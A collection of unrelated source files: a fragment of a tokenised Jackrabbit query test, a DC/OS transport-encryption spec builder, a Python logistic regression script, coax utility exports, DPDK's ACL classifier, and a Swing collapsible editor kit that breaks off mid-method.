literal|"application/rtf"
argument_list|,
literal|"quick brown fox"
argument_list|)
expr_stmt|;
block|}
specifier|public
name|void
name|testNtFile
parameter_list|()
throws|throws
name|RepositoryException
throws|,
name|IOException
block|{
while|while
condition|(
name|testRootNode
operator|.
name|hasNode
argument_list|(
name|nodeName1
argument_list|)
condition|)
block|{
name|testRootNode
operator|.
name|getNode
argument_list|(
name|nodeName1
argument_list|)
operator|.
name|remove
argument_list|()
expr_stmt|;
block|}
name|String
name|content
init|=
literal|"The quick brown fox jumps over the lazy dog."
decl_stmt|;
name|Node
name|file
init|=
name|JcrUtils
operator|.
name|putFile
argument_list|(
name|testRootNode
argument_list|,
name|nodeName1
argument_list|,
literal|"text/plain"
argument_list|,
operator|new
name|ByteArrayInputStream
argument_list|(
name|content
operator|.
name|getBytes
argument_list|(
literal|"UTF-8"
argument_list|)
argument_list|)
argument_list|)
decl_stmt|;
name|testRootNode
operator|.
name|getSession
argument_list|()
operator|.
name|save
argument_list|()
expr_stmt|;
name|String
name|xpath
init|=
name|testPath
operator|+
literal|"/*[jcr:contains(jcr:content, 'lazy')]"
decl_stmt|;
name|executeXPathQuery
argument_list|(
name|xpath
argument_list|,
operator|new
name|Node
index|[]
block|{
name|file
block|}
argument_list|)
expr_stmt|;
block|}
specifier|private
name|void
name|assertFileContains
parameter_list|(
name|String
name|name
parameter_list|,
name|String
name|type
parameter_list|,
name|String
modifier|...
name|statements
parameter_list|)
throws|throws
name|Exception
block|{
if|if
condition|(
name|testRootNode
operator|.
name|hasNode
argument_list|(
name|nodeName1
argument_list|)
condition|)
block|{
name|testRootNode
operator|.
name|getNode
argument_list|(
name|nodeName1
argument_list|)
operator|.
name|remove
argument_list|()
expr_stmt|;
block|}
name|testRootNode
operator|.
name|getSession
argument_list|()
operator|.
name|save
argument_list|()
expr_stmt|;
name|Node
name|resource
init|=
name|testRootNode
operator|.
name|addNode
argument_list|(
name|nodeName1
argument_list|,
name|NodeType
operator|.
name|NT_RESOURCE
argument_list|)
decl_stmt|;
name|resource
operator|.
name|setProperty
argument_list|(
name|JcrConstants
operator|.
name|JCR_MIMETYPE
argument_list|,
name|type
argument_list|)
expr_stmt|;
name|InputStream
name|stream
init|=
name|getClass
argument_list|()
operator|.
name|getResourceAsStream
argument_list|(
name|name
argument_list|)
decl_stmt|;
name|assertNotNull
argument_list|(
name|stream
argument_list|)
expr_stmt|;
try|try
block|{
name|Binary
name|binary
init|=
name|testRootNode
operator|.
name|getSession
argument_list|()
operator|.
name|getValueFactory
argument_list|()
operator|.
name|createBinary
argument_list|(
name|stream
argument_list|)
decl_stmt|;
name|resource
operator|.
name|setProperty
argument_list|(
name|JcrConstants
operator|.
name|JCR_DATA
argument_list|,
name|binary
argument_list|)
expr_stmt|;
block|}
finally|finally
block|{
name|stream
operator|.
name|close
argument_list|()
expr_stmt|;
block|}
name|testRootNode
operator|.
name|getSession
argument_list|()
operator|.
name|save
argument_list|()
expr_stmt|;
for|for
control|(
name|String
name|statement
range|:
name|statements
control|)
block|{
name|assertContainsQuery
argument_list|(
name|statement
argument_list|,
literal|true
argument_list|)
expr_stmt|;
block|}
block|}
annotation|@
name|SuppressWarnings
argument_list|(
literal|"deprecation"
argument_list|)
specifier|private
name|void
name|assertContainsQuery
parameter_list|(
name|String
name|statement
parameter_list|,
name|boolean
name|match
parameter_list|)
throws|throws
name|InvalidQueryException
throws|,
name|RepositoryException
block|{
name|StringBuffer
name|stmt
init|=
operator|new
name|StringBuffer
argument_list|()
decl_stmt|;
name|stmt
operator|.
name|append
argument_list|(
literal|"/jcr:root"
argument_list|)
operator|.
name|append
argument_list|(
name|testRoot
argument_list|)
operator|.
name|append
argument_list|(
literal|"/*"
argument_list|)
expr_stmt|;
name|stmt
operator|.
name|append
argument_list|(
literal|"[jcr:contains(., '"
argument_list|)
operator|.
name|append
argument_list|(
name|statement
argument_list|)
expr_stmt|;
name|stmt
operator|.
name|append
argument_list|(
literal|"')]"
argument_list|)
expr_stmt|;
name|Query
name|q
init|=
name|qm
operator|.
name|createQuery
argument_list|(
name|stmt
operator|.
name|toString
argument_list|()
argument_list|,
name|Query
operator|.
name|XPATH
argument_list|)
decl_stmt|;
name|checkResult
argument_list|(
name|q
operator|.
name|execute
argument_list|()
argument_list|,
name|match
condition|?
literal|1
else|:
literal|0
argument_list|)
expr_stmt|;
name|stmt
operator|=
operator|new
name|StringBuffer
argument_list|()
expr_stmt|;
name|stmt
operator|.
name|append
argument_list|(
literal|"SELECT * FROM nt:base "
argument_list|)
expr_stmt|;
name|stmt
operator|.
name|append
argument_list|(
literal|"WHERE jcr:path LIKE '"
argument_list|)
operator|.
name|append
argument_list|(
name|testRoot
argument_list|)
operator|.
name|append
argument_list|(
literal|"/%' "
argument_list|)
expr_stmt|;
name|stmt
operator|.
name|append
argument_list|(
literal|"AND CONTAINS(., '"
argument_list|)
operator|.
name|append
argument_list|(
name|statement
argument_list|)
operator|.
name|append
argument_list|(
literal|"')"
argument_list|)
expr_stmt|;
name|q
operator|=
name|qm
operator|.
name|createQuery
argument_list|(
name|stmt
operator|.
name|toString
argument_list|()
argument_list|,
name|Query
operator|.
name|SQL
argument_list|)
expr_stmt|;
name|checkResult
argument_list|(
name|q
operator|.
name|execute
argument_list|()
argument_list|,
name|match
condition|?
literal|1
else|:
literal|0
argument_list|)
expr_stmt|;
block|}
block|}
end_class
end_unit
|
erebe/dcos-commons
|
sdk/scheduler/src/main/java/com/mesosphere/sdk/specification/DefaultTransportEncryptionSpec.java
|
<gh_stars>100-1000
package com.mesosphere.sdk.specification;
import com.fasterxml.jackson.annotation.JsonCreator;
import com.fasterxml.jackson.annotation.JsonProperty;
import org.apache.commons.lang3.builder.EqualsBuilder;
import org.apache.commons.lang3.builder.HashCodeBuilder;
import org.apache.commons.lang3.builder.ReflectionToStringBuilder;
/**
* Default implementation of {@link TransportEncryptionSpec}.
*/
public class DefaultTransportEncryptionSpec implements TransportEncryptionSpec {
private final String name;
private final Type type;
@JsonCreator
private DefaultTransportEncryptionSpec(
@JsonProperty("name") String name,
@JsonProperty("type") Type type)
{
this.name = name;
this.type = type;
}
public DefaultTransportEncryptionSpec(Builder builder) {
this(builder.name, builder.type);
ValidationUtils.nonBlank(this, "name", name);
}
public static Builder newBuilder() {
return new Builder();
}
@Override
public String getName() {
return name;
}
@Override
public Type getType() {
return type;
}
@Override
public boolean equals(Object o) {
return EqualsBuilder.reflectionEquals(this, o);
}
@Override
public int hashCode() {
return HashCodeBuilder.reflectionHashCode(this);
}
@Override
public String toString() {
return ReflectionToStringBuilder.toString(this);
}
/**
* A {@link DefaultTransportEncryptionSpec} builder.
*/
public static final class Builder {
private String name;
private Type type;
private Builder() {
}
public Builder name(String name) {
this.name = name;
return this;
}
public Builder type(Type type) {
this.type = type;
return this;
}
public DefaultTransportEncryptionSpec build() {
return new DefaultTransportEncryptionSpec(this);
}
}
}
|
austinburks/nlp-udemy
|
machine_learning_examples/ann_logistic_extra/logistic_predict.py
|
<filename>machine_learning_examples/ann_logistic_extra/logistic_predict.py<gh_stars>0
import numpy as np
from process import get_binary_data
X, Y = get_binary_data()
# randomly initialize weights
D = X.shape[1]
W = np.random.randn(D)
b = 0 # bias term
# make predictions
def sigmoid(a):
return 1 / (1 + np.exp(-a))
def forward(X, W, b):
return sigmoid(X.dot(W) + b)
P_Y_given_X = forward(X, W, b)
predictions = np.round(P_Y_given_X)
# calculate the accuracy
def classification_rate(Y, P):
return np.mean(Y == P)
print "Score:", classification_rate(Y, predictions)
|
sleepy-owl/coax
|
coax/utils/__init__.py
|
<gh_stars>0
# ------------------------------------------------------------------------------------------------ #
# MIT License #
# #
# Copyright (c) 2020, Microsoft Corporation #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software #
# and associated documentation files (the "Software"), to deal in the Software without #
# restriction, including without limitation the rights to use, copy, modify, merge, publish, #
# distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the #
# Software is furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in all copies or #
# substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING #
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND #
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, #
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. #
# ------------------------------------------------------------------------------------------------ #
r"""
Utilities
=========
This is a collection of utility (helper) functions used throughout the package.
Object Reference
----------------
.. autosummary::
:nosignatures:
coax.utils.OrnsteinUhlenbeckNoise
coax.utils.StepwiseLinearFunction
coax.utils.SegmentTree
coax.utils.SumTree
coax.utils.MinTree
coax.utils.MaxTree
coax.utils.argmax
coax.utils.argmin
coax.utils.batch_to_single
coax.utils.check_array
coax.utils.check_preprocessors
coax.utils.clipped_logit
coax.utils.default_preprocessor
coax.utils.diff_transform
coax.utils.diff_transform_matrix
coax.utils.docstring
coax.utils.double_relu
coax.utils.dump
coax.utils.dumps
coax.utils.enable_logging
coax.utils.generate_gif
coax.utils.get_env_attr
coax.utils.get_grads_diagnostics
coax.utils.get_magnitude_quantiles
coax.utils.get_transition_batch
coax.utils.has_env_attr
coax.utils.idx
coax.utils.is_policy
coax.utils.is_qfunction
coax.utils.is_reward_function
coax.utils.is_stochastic
coax.utils.is_transition_model
coax.utils.is_vfunction
coax.utils.isscalar
coax.utils.jit
coax.utils.load
coax.utils.loads
coax.utils.merge_dicts
coax.utils.pretty_print
coax.utils.pretty_repr
coax.utils.reload_recursive
coax.utils.render_episode
coax.utils.safe_sample
coax.utils.single_to_batch
coax.utils.tree_ravel
"""
from ._action_noise import OrnsteinUhlenbeckNoise
from ._array import (
StepwiseLinearFunction,
argmax,
argmin,
batch_to_single,
check_array,
check_preprocessors,
chunks_pow2,
clipped_logit,
default_preprocessor,
diff_transform,
diff_transform_matrix,
double_relu,
get_grads_diagnostics,
get_magnitude_quantiles,
get_transition_batch,
idx,
isscalar,
merge_dicts,
safe_sample,
single_to_batch,
tree_ravel,
)
from ._jit import jit
from ._misc import (
docstring,
dump,
dumps,
enable_logging,
generate_gif,
get_env_attr,
has_env_attr,
is_policy,
is_qfunction,
is_reward_function,
is_stochastic,
is_transition_model,
is_vfunction,
load,
loads,
pretty_print,
pretty_repr,
reload_recursive,
render_episode,
)
from ._segment_tree import SegmentTree, SumTree, MinTree, MaxTree
__all__ = (
'StepwiseLinearFunction',
'OrnsteinUhlenbeckNoise',
'SegmentTree',
'SumTree',
'MinTree',
'MaxTree',
'argmax',
'argmin',
'batch_to_single',
'check_array',
'check_preprocessors',
'chunks_pow2',
'clipped_logit',
'default_preprocessor',
'diff_transform',
'diff_transform_matrix',
'docstring',
'double_relu',
'dump',
'dumps',
'enable_logging',
'generate_gif',
'get_env_attr',
'get_grads_diagnostics',
'get_magnitude_quantiles',
'get_transition_batch',
'has_env_attr',
'idx',
'is_policy',
'is_qfunction',
'is_reward_function',
'is_stochastic',
'is_transition_model',
'is_vfunction',
'isscalar',
'jit',
'load',
'loads',
'merge_dicts',
'pretty_print',
'pretty_repr',
'reload_recursive',
'render_episode',
'safe_sample',
'single_to_batch',
'tree_ravel',
)
|
ajitkhaparde/trex-core
|
src/dpdk/lib/librte_acl/rte_acl.c
|
<reponame>ajitkhaparde/trex-core
/* SPDX-License-Identifier: BSD-3-Clause
* Copyright(c) 2010-2014 Intel Corporation
*/
#include <rte_eal_memconfig.h>
#include <rte_string_fns.h>
#include <rte_acl.h>
#include <rte_tailq.h>
#include <rte_vect.h>
#include "acl.h"
TAILQ_HEAD(rte_acl_list, rte_tailq_entry);
static struct rte_tailq_elem rte_acl_tailq = {
.name = "RTE_ACL",
};
EAL_REGISTER_TAILQ(rte_acl_tailq)
#ifndef CC_AVX512_SUPPORT
/*
* If the compiler doesn't support AVX512 instructions,
* then the dummy one would be used instead for AVX512 classify method.
*/
int
rte_acl_classify_avx512x16(__rte_unused const struct rte_acl_ctx *ctx,
__rte_unused const uint8_t **data,
__rte_unused uint32_t *results,
__rte_unused uint32_t num,
__rte_unused uint32_t categories)
{
return -ENOTSUP;
}
int
rte_acl_classify_avx512x32(__rte_unused const struct rte_acl_ctx *ctx,
__rte_unused const uint8_t **data,
__rte_unused uint32_t *results,
__rte_unused uint32_t num,
__rte_unused uint32_t categories)
{
return -ENOTSUP;
}
#endif
#ifndef CC_AVX2_SUPPORT
/*
* If the compiler doesn't support AVX2 instructions,
* then the dummy one would be used instead for AVX2 classify method.
*/
int
rte_acl_classify_avx2(__rte_unused const struct rte_acl_ctx *ctx,
__rte_unused const uint8_t **data,
__rte_unused uint32_t *results,
__rte_unused uint32_t num,
__rte_unused uint32_t categories)
{
return -ENOTSUP;
}
#endif
#ifndef RTE_ARCH_X86
int
rte_acl_classify_sse(__rte_unused const struct rte_acl_ctx *ctx,
__rte_unused const uint8_t **data,
__rte_unused uint32_t *results,
__rte_unused uint32_t num,
__rte_unused uint32_t categories)
{
return -ENOTSUP;
}
#endif
#ifndef RTE_ARCH_ARM
int
rte_acl_classify_neon(__rte_unused const struct rte_acl_ctx *ctx,
__rte_unused const uint8_t **data,
__rte_unused uint32_t *results,
__rte_unused uint32_t num,
__rte_unused uint32_t categories)
{
return -ENOTSUP;
}
#endif
#ifndef RTE_ARCH_PPC_64
int
rte_acl_classify_altivec(__rte_unused const struct rte_acl_ctx *ctx,
__rte_unused const uint8_t **data,
__rte_unused uint32_t *results,
__rte_unused uint32_t num,
__rte_unused uint32_t categories)
{
return -ENOTSUP;
}
#endif
static const rte_acl_classify_t classify_fns[] = {
[RTE_ACL_CLASSIFY_DEFAULT] = rte_acl_classify_scalar,
[RTE_ACL_CLASSIFY_SCALAR] = rte_acl_classify_scalar,
[RTE_ACL_CLASSIFY_SSE] = rte_acl_classify_sse,
[RTE_ACL_CLASSIFY_AVX2] = rte_acl_classify_avx2,
[RTE_ACL_CLASSIFY_NEON] = rte_acl_classify_neon,
[RTE_ACL_CLASSIFY_ALTIVEC] = rte_acl_classify_altivec,
[RTE_ACL_CLASSIFY_AVX512X16] = rte_acl_classify_avx512x16,
[RTE_ACL_CLASSIFY_AVX512X32] = rte_acl_classify_avx512x32,
};
/*
* Helper function for acl_check_alg.
* Check support for ARM specific classify methods.
*/
static int
acl_check_alg_arm(enum rte_acl_classify_alg alg)
{
if (alg == RTE_ACL_CLASSIFY_NEON) {
#if defined(RTE_ARCH_ARM64)
if (rte_vect_get_max_simd_bitwidth() >= RTE_VECT_SIMD_128)
return 0;
#elif defined(RTE_ARCH_ARM)
if (rte_cpu_get_flag_enabled(RTE_CPUFLAG_NEON) &&
rte_vect_get_max_simd_bitwidth() >= RTE_VECT_SIMD_128)
return 0;
#endif
return -ENOTSUP;
}
return -EINVAL;
}
/*
* Helper function for acl_check_alg.
* Check support for PPC specific classify methods.
*/
static int
acl_check_alg_ppc(enum rte_acl_classify_alg alg)
{
if (alg == RTE_ACL_CLASSIFY_ALTIVEC) {
#if defined(RTE_ARCH_PPC_64)
if (rte_vect_get_max_simd_bitwidth() >= RTE_VECT_SIMD_128)
return 0;
#endif
return -ENOTSUP;
}
return -EINVAL;
}
#ifdef CC_AVX512_SUPPORT
static int
acl_check_avx512_cpu_flags(void)
{
return (rte_cpu_get_flag_enabled(RTE_CPUFLAG_AVX512F) &&
rte_cpu_get_flag_enabled(RTE_CPUFLAG_AVX512VL) &&
rte_cpu_get_flag_enabled(RTE_CPUFLAG_AVX512CD) &&
rte_cpu_get_flag_enabled(RTE_CPUFLAG_AVX512BW));
}
#endif
/*
* Helper function for acl_check_alg.
* Check support for x86 specific classify methods.
*/
static int
acl_check_alg_x86(enum rte_acl_classify_alg alg)
{
if (alg == RTE_ACL_CLASSIFY_AVX512X32) {
#ifdef CC_AVX512_SUPPORT
if (acl_check_avx512_cpu_flags() != 0 &&
rte_vect_get_max_simd_bitwidth() >= RTE_VECT_SIMD_512)
return 0;
#endif
return -ENOTSUP;
}
if (alg == RTE_ACL_CLASSIFY_AVX512X16) {
#ifdef CC_AVX512_SUPPORT
if (acl_check_avx512_cpu_flags() != 0 &&
rte_vect_get_max_simd_bitwidth() >= RTE_VECT_SIMD_256)
return 0;
#endif
return -ENOTSUP;
}
if (alg == RTE_ACL_CLASSIFY_AVX2) {
#ifdef CC_AVX2_SUPPORT
if (rte_cpu_get_flag_enabled(RTE_CPUFLAG_AVX2) &&
rte_vect_get_max_simd_bitwidth() >= RTE_VECT_SIMD_256)
return 0;
#endif
return -ENOTSUP;
}
if (alg == RTE_ACL_CLASSIFY_SSE) {
#ifdef RTE_ARCH_X86
if (rte_cpu_get_flag_enabled(RTE_CPUFLAG_SSE4_1) &&
rte_vect_get_max_simd_bitwidth() >= RTE_VECT_SIMD_128)
return 0;
#endif
return -ENOTSUP;
}
return -EINVAL;
}
/*
* Check if input alg is supported by given platform/binary.
* Note that both conditions should be met:
* - at build time compiler supports ISA used by given methods
* - at run time target cpu supports necessary ISA.
*/
static int
acl_check_alg(enum rte_acl_classify_alg alg)
{
switch (alg) {
case RTE_ACL_CLASSIFY_NEON:
return acl_check_alg_arm(alg);
case RTE_ACL_CLASSIFY_ALTIVEC:
return acl_check_alg_ppc(alg);
case RTE_ACL_CLASSIFY_AVX512X32:
case RTE_ACL_CLASSIFY_AVX512X16:
case RTE_ACL_CLASSIFY_AVX2:
case RTE_ACL_CLASSIFY_SSE:
return acl_check_alg_x86(alg);
/* scalar method is supported on all platforms */
case RTE_ACL_CLASSIFY_SCALAR:
return 0;
default:
return -EINVAL;
}
}
/*
* Get preferred alg for given platform.
*/
static enum rte_acl_classify_alg
acl_get_best_alg(void)
{
/*
* array of supported methods for each platform.
* Note that order is important - from most to less preferable.
*/
static const enum rte_acl_classify_alg alg[] = {
#if defined(RTE_ARCH_ARM)
RTE_ACL_CLASSIFY_NEON,
#elif defined(RTE_ARCH_PPC_64)
RTE_ACL_CLASSIFY_ALTIVEC,
#elif defined(RTE_ARCH_X86)
RTE_ACL_CLASSIFY_AVX512X32,
RTE_ACL_CLASSIFY_AVX512X16,
RTE_ACL_CLASSIFY_AVX2,
RTE_ACL_CLASSIFY_SSE,
#endif
RTE_ACL_CLASSIFY_SCALAR,
};
uint32_t i;
/* find best possible alg */
for (i = 0; i != RTE_DIM(alg) && acl_check_alg(alg[i]) != 0; i++)
;
/* we always have to find something suitable */
RTE_VERIFY(i != RTE_DIM(alg));
return alg[i];
}
extern int
rte_acl_set_ctx_classify(struct rte_acl_ctx *ctx, enum rte_acl_classify_alg alg)
{
int32_t rc;
/* formal parameters check */
if (ctx == NULL || (uint32_t)alg >= RTE_DIM(classify_fns))
return -EINVAL;
/* user asked us to select the *best* one */
if (alg == RTE_ACL_CLASSIFY_DEFAULT)
alg = acl_get_best_alg();
/* check that given alg is supported */
rc = acl_check_alg(alg);
if (rc != 0)
return rc;
ctx->alg = alg;
return 0;
}
int
rte_acl_classify_alg(const struct rte_acl_ctx *ctx, const uint8_t **data,
uint32_t *results, uint32_t num, uint32_t categories,
enum rte_acl_classify_alg alg)
{
if (categories != 1 &&
((RTE_ACL_RESULTS_MULTIPLIER - 1) & categories) != 0)
return -EINVAL;
return classify_fns[alg](ctx, data, results, num, categories);
}
int
rte_acl_classify(const struct rte_acl_ctx *ctx, const uint8_t **data,
uint32_t *results, uint32_t num, uint32_t categories)
{
return rte_acl_classify_alg(ctx, data, results, num, categories,
ctx->alg);
}
struct rte_acl_ctx *
rte_acl_find_existing(const char *name)
{
struct rte_acl_ctx *ctx = NULL;
struct rte_acl_list *acl_list;
struct rte_tailq_entry *te;
acl_list = RTE_TAILQ_CAST(rte_acl_tailq.head, rte_acl_list);
rte_mcfg_tailq_read_lock();
TAILQ_FOREACH(te, acl_list, next) {
ctx = (struct rte_acl_ctx *) te->data;
if (strncmp(name, ctx->name, sizeof(ctx->name)) == 0)
break;
}
rte_mcfg_tailq_read_unlock();
if (te == NULL) {
rte_errno = ENOENT;
return NULL;
}
return ctx;
}
void
rte_acl_free(struct rte_acl_ctx *ctx)
{
struct rte_acl_list *acl_list;
struct rte_tailq_entry *te;
if (ctx == NULL)
return;
acl_list = RTE_TAILQ_CAST(rte_acl_tailq.head, rte_acl_list);
rte_mcfg_tailq_write_lock();
/* find our tailq entry */
TAILQ_FOREACH(te, acl_list, next) {
if (te->data == (void *) ctx)
break;
}
if (te == NULL) {
rte_mcfg_tailq_write_unlock();
return;
}
TAILQ_REMOVE(acl_list, te, next);
rte_mcfg_tailq_write_unlock();
rte_free(ctx->mem);
rte_free(ctx);
rte_free(te);
}
struct rte_acl_ctx *
rte_acl_create(const struct rte_acl_param *param)
{
size_t sz;
struct rte_acl_ctx *ctx;
struct rte_acl_list *acl_list;
struct rte_tailq_entry *te;
char name[sizeof(ctx->name)];
acl_list = RTE_TAILQ_CAST(rte_acl_tailq.head, rte_acl_list);
/* check that input parameters are valid. */
if (param == NULL || param->name == NULL) {
rte_errno = EINVAL;
return NULL;
}
snprintf(name, sizeof(name), "ACL_%s", param->name);
/* calculate amount of memory required for pattern set. */
sz = sizeof(*ctx) + param->max_rule_num * param->rule_size;
/* get EAL TAILQ lock. */
rte_mcfg_tailq_write_lock();
/* if we already have one with that name */
TAILQ_FOREACH(te, acl_list, next) {
ctx = (struct rte_acl_ctx *) te->data;
if (strncmp(param->name, ctx->name, sizeof(ctx->name)) == 0)
break;
}
/* if ACL with such name doesn't exist, then create a new one. */
if (te == NULL) {
ctx = NULL;
te = rte_zmalloc("ACL_TAILQ_ENTRY", sizeof(*te), 0);
if (te == NULL) {
RTE_LOG(ERR, ACL, "Cannot allocate tailq entry!\n");
goto exit;
}
ctx = rte_zmalloc_socket(name, sz, RTE_CACHE_LINE_SIZE, param->socket_id);
if (ctx == NULL) {
RTE_LOG(ERR, ACL,
"allocation of %zu bytes on socket %d for %s failed\n",
sz, param->socket_id, name);
rte_free(te);
goto exit;
}
/* init new allocated context. */
ctx->rules = ctx + 1;
ctx->max_rules = param->max_rule_num;
ctx->rule_sz = param->rule_size;
ctx->socket_id = param->socket_id;
ctx->alg = acl_get_best_alg();
strlcpy(ctx->name, param->name, sizeof(ctx->name));
te->data = (void *) ctx;
TAILQ_INSERT_TAIL(acl_list, te, next);
}
exit:
rte_mcfg_tailq_write_unlock();
return ctx;
}
static int
acl_add_rules(struct rte_acl_ctx *ctx, const void *rules, uint32_t num)
{
uint8_t *pos;
if (num + ctx->num_rules > ctx->max_rules)
return -ENOMEM;
pos = ctx->rules;
pos += ctx->rule_sz * ctx->num_rules;
memcpy(pos, rules, num * ctx->rule_sz);
ctx->num_rules += num;
return 0;
}
static int
acl_check_rule(const struct rte_acl_rule_data *rd)
{
if ((RTE_LEN2MASK(RTE_ACL_MAX_CATEGORIES, typeof(rd->category_mask)) &
rd->category_mask) == 0 ||
rd->priority > RTE_ACL_MAX_PRIORITY ||
rd->priority < RTE_ACL_MIN_PRIORITY)
return -EINVAL;
return 0;
}
int
rte_acl_add_rules(struct rte_acl_ctx *ctx, const struct rte_acl_rule *rules,
uint32_t num)
{
const struct rte_acl_rule *rv;
uint32_t i;
int32_t rc;
if (ctx == NULL || rules == NULL || 0 == ctx->rule_sz)
return -EINVAL;
for (i = 0; i != num; i++) {
rv = (const struct rte_acl_rule *)
((uintptr_t)rules + i * ctx->rule_sz);
rc = acl_check_rule(&rv->data);
if (rc != 0) {
RTE_LOG(ERR, ACL, "%s(%s): rule #%u is invalid\n",
__func__, ctx->name, i + 1);
return rc;
}
}
return acl_add_rules(ctx, rules, num);
}
/*
* Reset all rules.
* Note that RT structures are not affected.
*/
void
rte_acl_reset_rules(struct rte_acl_ctx *ctx)
{
if (ctx != NULL)
ctx->num_rules = 0;
}
/*
* Reset all rules and destroys RT structures.
*/
void
rte_acl_reset(struct rte_acl_ctx *ctx)
{
if (ctx != NULL) {
rte_acl_reset_rules(ctx);
rte_acl_build(ctx, &ctx->config);
}
}
/*
* Dump ACL context to the stdout.
*/
void
rte_acl_dump(const struct rte_acl_ctx *ctx)
{
if (!ctx)
return;
printf("acl context <%s>@%p\n", ctx->name, ctx);
printf(" socket_id=%"PRId32"\n", ctx->socket_id);
printf(" alg=%"PRId32"\n", ctx->alg);
printf(" first_load_sz=%"PRIu32"\n", ctx->first_load_sz);
printf(" max_rules=%"PRIu32"\n", ctx->max_rules);
printf(" rule_size=%"PRIu32"\n", ctx->rule_sz);
printf(" num_rules=%"PRIu32"\n", ctx->num_rules);
printf(" num_categories=%"PRIu32"\n", ctx->num_categories);
printf(" num_tries=%"PRIu32"\n", ctx->num_tries);
}
/*
* Dump all ACL contexts to the stdout.
*/
void
rte_acl_list_dump(void)
{
struct rte_acl_ctx *ctx;
struct rte_acl_list *acl_list;
struct rte_tailq_entry *te;
acl_list = RTE_TAILQ_CAST(rte_acl_tailq.head, rte_acl_list);
rte_mcfg_tailq_read_lock();
TAILQ_FOREACH(te, acl_list, next) {
ctx = (struct rte_acl_ctx *) te->data;
rte_acl_dump(ctx);
}
rte_mcfg_tailq_read_unlock();
}
|
gavinbaker999/Java-Framework-Apps
|
ehscontrols/src/CollapsibleEditorKit.java
|
import java.applet.*;
import java.awt.*;
import java.awt.event.*;
import java.awt.image.*;
import java.awt.font.*;
import java.awt.color.*; // ColorSpace
import java.awt.geom.*; // AffineTransform
import java.sql.*;
import java.io.*;
import java.net.*;
import java.util.*;
import java.awt.List;
import java.awt.print.*;
import java.util.Date;
import java.util.Map;
import java.text.*;
import java.lang.reflect.*;
import java.beans.*;
import java.util.regex.Pattern;
import java.util.regex.Matcher;
import java.util.concurrent.*;
import javax.swing.*;
import javax.swing.event.*;
import javax.swing.border.*;
import javax.swing.tree.*;
import javax.swing.table.*;
import javax.swing.Timer;
import javax.sound.sampled.*;
import javax.xml.parsers.*;
import javax.xml.transform.*;
import javax.xml.transform.dom.*;
import javax.xml.transform.sax.*;
import javax.xml.transform.stream.*;
import javax.xml.transform.OutputKeys.*;
import org.w3c.dom.*;
import org.w3c.dom.traversal.*;
import org.xml.sax.*;
import org.xml.sax.helpers.*;
import javax.script.*;
import javax.swing.filechooser.*;
//import javax.xml.ws.*;
//import javax.xml.ws.handler.*;
//import javax.xml.ws.handler.soap.*;
//import javax.xml.soap.*;
import javax.xml.namespace.QName;
//import javax.xml.ws.handler.Handler;
//import javax.xml.messaging.*;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathExpressionException;
import javax.xml.xpath.XPathFactory;
import javax.xml.stream.EventFilter;
import javax.xml.stream.StreamFilter;
import javax.xml.stream.XMLEventReader;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLReporter;
import javax.xml.stream.XMLResolver;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;
import javax.xml.stream.util.XMLEventAllocator;
import javax.xml.transform.Source;
import javax.sound.sampled.*;
//import sun.audio.*;
import javax.sound.sampled.DataLine;
import javax.sound.sampled.TargetDataLine;
import javax.sound.sampled.AudioFormat;
import javax.sound.sampled.AudioSystem;
import javax.sound.sampled.AudioInputStream;
import javax.sound.sampled.LineUnavailableException;
import javax.sound.sampled.AudioFileFormat;
import javax.imageio.event.*;
import javax.imageio.metadata.*;
import javax.imageio.plugins.jpeg.*;
import javax.imageio.plugins.bmp.*;
import javax.imageio.spi.*;
import javax.imageio.stream.*;
import javax.imageio.*;
//import javax.activation.URLDataSource.*;
import java.awt.geom.Point2D.*;
import javax.swing.text.*;
import javax.swing.text.html.*;
import javax.swing.text.html.parser.*;
import javax.swing.text.html.HTMLEditorKit.*;
import javax.swing.text.html.HTMLDocument.*;
import javax.swing.text.html.ParagraphView;
import java.awt.datatransfer.*;
import javax.swing.text.Element;
import javax.swing.text.Document;
import java.sql.*;
//import javax.jms.*;
import javax.naming.*;
//import javax.xml.xquery.XQConnection;
//import javax.xml.xquery.XQDataSource;
//import javax.xml.xquery.XQException;
//import javax.xml.xquery.XQPreparedExpression;
//import javax.xml.xquery.XQResultSequence;
//import com.saxonica.xqj.SaxonXQDataSource;
//import sun.misc.Unsafe;
//import sun.reflect.ReflectionFactory;
public class CollapsibleEditorKit extends HTMLEditorKit { //StyledEditorKit {
MouseListener lstCollapse=new MouseAdapter() {
public void mouseClicked(MouseEvent e) {
JEditorPane src=(JEditorPane)e.getSource();
int pos=src.viewToModel(e.getPoint());
View v=src.getUI().getRootView(src);
while (v!=null && !(v instanceof CollapsibleView)) {
int i=v.getViewIndex(pos, Position.Bias.Forward);
v=v.getView(i);
}
if (v!=null) {
Shape a=getAllocation(v, src);
if (a!=null) {
Rectangle r=a instanceof Rectangle ? (Rectangle)a : a.getBounds();
r.width=CollapsibleView.AREA_SHIFT;
r.height=CollapsibleView.AREA_SHIFT;
if (r.contains(e.getPoint())) {
CollapsibleView cv=(CollapsibleView)v;
cv.setExpanded(!cv.isExpanded());
DefaultStyledDocument doc= (DefaultStyledDocument)src.getDocument();
try {
doc.insertString(pos, "\n", new SimpleAttributeSet());
doc.remove(pos,1);
} catch (BadLocationException e1) {
e1.printStackTrace();
}
}
}
}
}
};
Cursor oldCursor;
MouseMotionListener lstMoveCollapse=new MouseMotionAdapter() {
public void mouseMoved(MouseEvent e) {
JEditorPane src=(JEditorPane)e.getSource();
if (oldCursor==null) {
oldCursor=src.getCursor();
}
int pos=src.viewToModel(e.getPoint());
